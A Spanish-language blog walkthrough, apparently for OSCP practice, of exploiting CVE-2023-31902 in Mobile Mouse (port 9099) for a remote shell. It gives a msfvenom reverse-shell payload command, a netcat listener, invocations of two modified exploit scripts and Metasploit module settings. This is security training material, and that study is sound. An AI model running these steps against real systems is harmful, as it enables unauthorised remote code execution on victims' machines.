know how mobile mouse CVE-2023-31902

## know how CVE-2023-31902
## mobile mouse CVE-2023-31902
## port 9099
## Customization José Luis Íñigo A.K.A Riskoo

Repositorio github con los códigos

Puedes usar los exploits 51010lanzar1.py 51010lanzar2.py

Tuve problemas al usar el exploit 51010.py , me fué imposible conseguir la reverse shell, por lo que tuve que investigar un poco.

Inicialmente entré usando el exploit de metasploit "cosa que sabemos que no vale en el OSCP", pero esto me sirvió para desde dentro ver que estaba pasando.

Una vez dentro comencé a ejecutar el exploit 51010. Recordad que lo que quiero es que funcione este exploit ya que el de metasploit funciona perfectamente, aunque hay que iniciarlo varias veces.

Observaciones

  1. El archivo se subía a veces y otras no
  2. El archivo tardaba desde que aparecía el nombre haciendo un dir pero con 0 bytes, hasta que estaba completo. Pero el exploit original solo esperaba 2 segundos cuando realmente tardaba bastante más.
  3. El archivo daba problemas a veces con el nombre command que le subías por lo que cogí y le establecí uno por defecto que es shell64.exe, obviamente se lo puedes cambiar.

Pasos para que funcione.

???????? La idea es que con el lanzar1 suba el archivo, cruzar los dedos para que suba y luego lanzar el "lanzar2" y debe de funcionar.

  1. Crea la reverse shell en .exe con msfvenom
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell64.exe LHOST=192.168.x.x LPORT=8082
  1. Pon un servidor python por el puerto 8080 donde esté el archivo shell64.exe

  2. Nos ponemos en escucha por el puerto 8082

rlwrap nc -lnvp 8082
  1. Lanzamos el exploit 51010lanzar1.py

python3 51010lanzar1.py --target 192.168.x.x --file shell64.exe --lhost 192.168.x.x
  1. lanzamos el exploit 51010lanzar2.py
python3 51010lanzar2.py --target 192.168.x.x --file shell64.exe --lhost 192.168.x.x

know how mobile mouse oscp Metasploit

Puedes encontrar el exploit haciendo searchsploit mobile mouse

Al final tuve que usar metasploit https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/misc/mobile_mouse_rce

Solo puse el rhost, el localhost y debug a true como aparece.

???????? He tenido que lanzar varias veces el exploit en metasploit para que me funcione porque aparece que no crea la sesión

set lhost 192.168.x.x
set rhosts 192.168.x.x
set verbose true
run

Entradas relacionadas